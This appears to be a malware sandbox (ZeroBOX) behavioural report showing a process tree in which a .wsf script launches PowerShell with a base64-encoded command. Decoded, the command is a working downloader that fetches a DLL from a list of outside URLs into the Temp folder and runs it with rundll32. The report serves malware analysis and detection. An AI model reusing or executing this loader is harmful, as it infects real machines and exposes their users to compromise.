popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xu-November.21(7354).wsf

    3044

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAUgBlAHAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAGUAcwBPAHYAZQByAHIAaQBvAHQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBiAGUAZgBsAGkAeAAuAGMAbAB1AGIALwBRADYAcAB5AC8AYgBiADIAeQBWACwAaAB0AHQAcABzADoALwAvAGIAcwBkAHQAcgBlAGUAaQBuAGMALgBjAG8AbQAvADUARABZAC8AeQBZADAASwB2ADEAZgBBAEQARgAxACwAaAB0AHQAcABzADoALwAvAG0AZQBkAGkAYwBhAGkAbgB0AGwALgBjAG8AbQAvAEMAbQB5AEgALwBUAEkAWQBZAEIAdABkAE0AVQBWACwAaAB0AHQAcABzADoALwAvAG4AbwBtAGEAZABsAG8AdgBlAC4AYwBvAG0ALgBiAHIALwBWAFIAOABmAC8ARQBHADEAZQBkAGUAUgBlAEcAbQBkACwAaAB0AHQAcABzADoALwAvAGMAaQBlAG4AdABpAGYAaQBjAGEAZwByAG8AdQBwAC4AYwBvAG0ALwBBAFIAdgBEAGkARQAvAEQASgAxAGEAUAB0AFQALABoAHQAdABwAHMAOgAvAC8AaQBsAHUAbQBpAG4AYQByAGUAbwBkAG8AbgB0AG8ALgBjAG8AbQAuAGIAcgAvADgASwAzAEkAQQAvADMAYgBpAHIAVwBMAHQAegA5ACwAaAB0AHQAcABzADoALwAvAGkAbgBzAHQAaQB0AHUAdABvAGUAawBiAGEAbABsAG8ALgBvAHIAZwAvAEQAdQBaAGoATgAvAHYASAB3AFoATgBhAGsAbQAsAGgAdAB0AHAAcwA6AC8ALwBpAGEAbgBqAGUAcwB1AHMAYwByAC4AbwByAGcALwAzAG4AUwBuAC8AQQBsAGoAbgBjAFIALABoAHQAdABwAHMAOgAvAC8AYwBvAG4AZQBjAHQAYQBiAHIAYQB6AGkAbABuAGUAdwBiAGEAbgBrAC4AYwBvAG0ALwB2AHkAeABCAC8AaQBQADkARwA2AGsAawAsAGgAdAB0AHAAcwA6AC8ALwBhAGwAawBhAG4AYQByAGkAYQAtAHUAYQBlAC4AYwBvAG0ALwAzAGkAdgAvADkAQQBlAFAAYgBVAEsAVQAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABjAGgAaQBvAGwAaQB0AGUARABlAGMAawBzAHcAYQBiAGIAZQByACAAaQBuACAAJABSAGUAcAByAGUAcwBlAG4AdABhAHQAaQBvAG4AZQBzAE8AdgBlAHIAcgBpAG8AdAApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAYwBoAGkAbwBsAGkAdABlAEQAZQBjAGsAcwB3AGEAYgBiAGUAcgAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADIAMAAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAVAB1AGIAdwBvAG0AYQBuAC4ATQBlAHQAYQBiAGkAcwBtAHUAdABoAGkAYwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAdQBiAHcAbwBtAGEAbgAuAE0AZQB0AGEAYgBpAHMAbQB1AHQAaABpAGMAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAVAB1AGIAdwBvAG0AYQBuAC4ATQBlAHQAYQBiAGkAcwBtAHUAdABoAGkAYwAsAE4AaQBrAG4AOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="

      2184

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf